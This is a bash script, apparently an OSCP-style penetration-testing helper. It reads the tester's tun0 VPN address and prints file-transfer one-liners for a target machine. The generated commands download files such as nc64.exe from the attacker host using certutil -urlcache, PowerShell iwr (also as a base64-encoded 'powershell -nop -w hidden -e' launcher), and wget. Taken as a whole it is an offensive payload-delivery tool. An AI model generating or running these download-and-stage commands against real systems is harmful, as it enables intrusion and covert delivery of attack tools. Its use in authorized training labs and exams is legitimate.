#!/bin/bash
# Inspired by Miharada (Tiwa Ramdhani) [https://github.com/Miharada/MyOSCPTools/blob/main/TransferFileGenerator.py]

function get_tun0_ip {
    ip addr show tun0 2>/dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1
}

# Check if tun0 exists
if ! ip link show tun0 &>/dev/null; then
    echo "Error: tun0 interface not found. Please ensure it is active."
    exit 1
fi

if [ "$#" -lt 2 ] || [ "$#" -gt 3 ]; then
    echo "Usage: tf_generate <file_name> <file_output> <port>"
    echo "Ex: tf_generate nc64.exe nc.exe 8080"
    echo "Port is optional. Default is 80."
    exit 1
fi

file_name=$1
file_output=$2
port=${3:-80}

lhost=$(get_tun0_ip)
if [ -z "$lhost" ]; then
    echo "Error: Unable to get tun0 IP"
    exit 1
fi

# Generate payloads
certutil_payload="certutil -urlcache -split -f http://$lhost:$port/$file_name $file_output"
iwr_payload="iwr -Uri http://$lhost:$port/$file_name -Outfile $file_output"
iwr_encoded=$(echo -n "$iwr_payload" | iconv -f UTF-8 -t UTF-16LE | base64 -w 0)
wget_payload="wget http://$lhost:$port/$file_name -O $file_output"

# Print outputs
echo "== Windows =="
echo "$certutil_payload"
echo
echo "$iwr_payload"
echo
echo "powershell -nop -w hidden -e $iwr_encoded"
echo

echo "== Linux =="
echo "$wget_payload"
